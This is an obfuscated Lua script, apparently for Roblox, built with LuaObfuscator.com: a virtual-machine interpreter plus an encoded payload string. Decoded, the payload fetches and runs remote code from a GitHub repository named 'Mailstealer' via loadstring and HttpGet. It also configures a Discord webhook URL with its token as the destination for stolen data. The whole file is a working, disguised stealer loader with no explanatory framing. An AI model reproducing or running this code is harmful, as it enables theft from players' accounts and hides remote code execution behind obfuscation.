--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v71,v19);v19=nil;v97=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v72-(v72%((147 + 785) -(857 + 74))) ;else local v73=877 -(282 + 595) ;local v74;while true do if (v73==0) then v74=(570 -(367 + 201))^(v32-((2565 -(1523 + 114)) -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==0) then v36,v37=v1(v16,v18,v18 + (1067 -(67 + 1 + 997)) );v18=v18 + ((283 + 989) -(226 + 1044)) ;v35=1;end if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end end end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(957 -(892 + 65))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((14 -8) -(2 + 0)) ;v38=(3 -2) -0 ;end if (v38==1) then return (v42 * ((16778518 -(802 + 150)) -(87 + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + 68)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1,20) * ((3 -1)^32)) + v43 ;local v47=v20(v44,16 + 5 ,31);local v48=((v20(v44,1029 -(915 + 82) )==(2 -(443 -(416 + 26)))) and  -(1 + (0 -0))) or (1 -0) ;if (v47==((510 + 677) -(1069 + 118))) then if (v46==((0 -0) -0)) then return v48 * 0 ;else v47=1 -0 ;v45=0 + 0 ;end elseif (v47==(3636 -1589)) then return ((v46==(0 + 0)) and (v48 * (1/(791 -((806 -(145 + 293)) + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v49)local v50;if  not v49 then local v75=430 -(44 + 386) ;while true do if ((1486 -(998 + 488))==v75) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=1 + 0 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1852 -(1409 + 441))) then v57=nil;v58=nil;v52=721 -(15 + 703) ;end if (v52==(2 + 2)) then while true do if ((438 -(262 + 176))~=v53) then else v54=1721 -(345 + 1376) ;v55=nil;v53=689 -(198 + 490) ;end if (v53~=2) then else local v96=0 -0 ;while true do if (v96==0) then v58=nil;v59=nil;v96=2 -1 ;end if (v96==(1207 -(696 + 510))) then v53=5 -2 ;break;end end end if (1==v53) then v56=nil;v57=nil;v53=2;end if ((1265 -(1091 + 171))==v53) then v60=nil;while true do if (v54==0) then local v103=0;local v104;while true do if (v103==0) then v104=0;while true do if (v104~=(1 + 0)) then else v57={};v54=1;break;end if (v104==0) then v55={};v56={};v104=1;end end break;end end end if (v54==(9 -6)) then local v105=0 -0 ;while true do if ((374 -(123 + 251))==v105) then for v120=1,v23() do v56[v120-(4 -3) ]=v28();end return v58;end end end if (v54~=(699 -(208 + 490))) then else local v106=0;while true do if (v106~=0) then else v58={v55,v56,nil,v57};v59=v23();v106=1 + 0 ;end if (v106==1) then v60={};v54=2;break;end end end if (2==v54) then for v108=1 + 0 ,v59 do local v109=0;local v110;local v111;local v112;while true do if (v109==(837 -(660 + 176))) then v112=nil;while true do if (v110~=0) then else local v152=0 + 0 ;while true do if (v152~=(202 -(14 + 188))) then else v111=v21();v112=nil;v152=676 -(534 + 141) ;end if (v152~=(1 + 0)) then else v110=1;break;end end end if (v110==1) then if (v111==(1 + 0)) then v112=v21()~=0 ;elseif (v111==2) then v112=v24();elseif (v111~=3) then else v112=v25();end v60[v108]=v112;break;end end break;end if (v109==(0 + 0)) then v110=0;v111=nil;v109=1 -0 ;end end end v58[3]=v21();for v113=1,v23() do local v114=0 -0 ;local v115;while true do if (v114==0) then v115=v21();if (v20(v115,2 -1 ,1 + 0 )==(0 + 0)) then local v143=0;local v144;local v145;local v146;local v147;while true do if (v143~=1) then else v146=nil;v147=nil;v143=2;end if (v143==2) then while true do if (v144==(397 -(115 + 281))) then local v196=0 -0 ;while true do if (v196==(0 + 0)) then v147={v22(),v22(),nil,nil};if (v145==(0 -0)) then local v202=0;local v203;local v204;while true do if (v202~=(2 -1)) then else while true do if (v203==(285 -(134 + 151))) then v204=1665 -(970 + 695) ;while true do if (v204~=0) then else v147[5 -2 ]=v22();v147[4]=v22();break;end end break;end end break;end if (0==v202) then v203=1990 -(582 + 1408) ;v204=nil;v202=1;end end elseif (v145==(3 -2)) then v147[3 -0 ]=v23();elseif (v145==(7 -5)) then v147[1827 -(1195 + 629) ]=v23() -((2 -0)^16) ;elseif (v145==3) then local v211=241 -(187 + 54) ;while true do if (v211==(780 -(162 + 618))) then v147[3 + 0 ]=v23() -((2 + 0)^16) ;v147[8 -4 ]=v22();break;end end end v196=1;end if (v196==(1 -0)) then v144=1 + 1 ;break;end end end if (v144~=2) then else local v197=1636 -(1373 + 263) ;while true do if (1~=v197) then else v144=1003 -(451 + 549) ;break;end if ((0 + 0)==v197) then if (v20(v146,1 -0 ,1 -0 )==1) then v147[2]=v60[v147[1386 -(746 + 638) ]];end if (v20(v146,1 + 1 ,2 -0 )==(342 -(218 + 123))) then v147[1584 -(1535 + 46) ]=v60[v147[3]];end v197=1 + 0 ;end end end if (v144==0) then local v198=0;while true do if (v198==(0 + 0)) then v145=v20(v115,2,3);v146=v20(v115,4,6);v198=1;end if (1==v198) then v144=561 -(306 + 254) ;break;end end end if (v144~=3) then else if (v20(v146,1 + 2 ,3)==(1 -0)) then v147[4]=v60[v147[1471 -(899 + 568) ]];end v55[v113]=v147;break;end end break;end if (v143==0) then v144=0;v145=nil;v143=1;end end end break;end end end v54=2 + 1 ;end end break;end end break;end if (v52==(2 -1)) then v55=nil;v56=nil;v52=2;end if ((606 -(268 + 335))~=v52) then else v59=nil;v60=nil;v52=294 -(60 + 230) ;end if (v52~=0) then else v53=572 -(426 + 146) ;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]();elseif (v92>1) then v83=v91[3];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=3) then v63[v91[3]]=v89[v91[2]];elseif (v92==4) then local v123=0;local v124;local v125;local v126;local v127;while true do if (v123==1) then v84=(v126 + v124) -1 ;v127=0;v123=2;end if (2==v123) then for v182=v124,v84 do local v183=0;while true do if (v183==0) then v127=v127 + 1 ;v89[v182]=v125[v127];break;end end end break;end if (v123==0) then v124=v91[2];v125,v126=v82(v89[v124](v13(v89,v124 + 1 ,v91[3])));v123=1;end end else local v128=0;local v129;while true do if (v128==0) then v129=v91[2];v89[v129]=v89[v129](v13(v89,v129 + 1 ,v84));break;end end end elseif (v92<=8) then if (v92<=6) then do return;end elseif (v92==7) then v63[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v63[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else local v134=0;local v135;local v136;while true do if (v134==1) then v89[v135 + 1 ]=v136;v89[v135]=v136[v91[4]];break;end if (v134==0) then v135=v91[2];v136=v89[v91[3]];v134=1;end end end elseif (v92<=9) then v89[v91[2]]=v91[3];elseif (v92==10) then local v137=0;local v138;local v139;local v140;local v141;local v142;while true do if (v137==0) then v138=nil;v139,v140=nil;v141=nil;v142=nil;v63[v91[3]]=v89[v91[2]];v137=1;end if (v137==3) then v89[v142 + 1 ]=v141;v89[v142]=v141[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v137=4;end if (v137==7) then v91=v79[v83];v83=v91[3];break;end if (v137==4) then v83=v83 + 1 ;v91=v79[v83];v142=v91[2];v139,v140=v82(v89[v142](v13(v89,v142 + 1 ,v91[3])));v84=(v140 + v142) -1 ;v137=5;end if (v137==1) then v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v137=2;end if (v137==5) then v138=0;for v184=v142,v84 do local v185=0;while true do if (v185==0) then v138=v138 + 1 ;v89[v184]=v139[v138];break;end end end v83=v83 + 1 ;v91=v79[v83];v142=v91[2];v137=6;end if (v137==6) then v89[v142]=v89[v142](v13(v89,v142 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v137=7;end if (v137==2) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v142=v91[2];v141=v89[v91[3]];v137=3;end end elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v63;else v89[v91[2]]=v63[v91[3]];end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030A3O0072696E72696E6F616E67030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303537313438333037333731323034362O382F513041794C2D455239426E6D5276382D75344661464972474453684E53496731306E776E384731444B564A39784143795F42754872395044416B763247416377724D337600163O0012093O00013O0026013O000D000100020004023O000D0001001209000100043O00120A000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026013O0001000100010004023O00010001001209000100043O001207000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00063O00017O00",v9(),...);
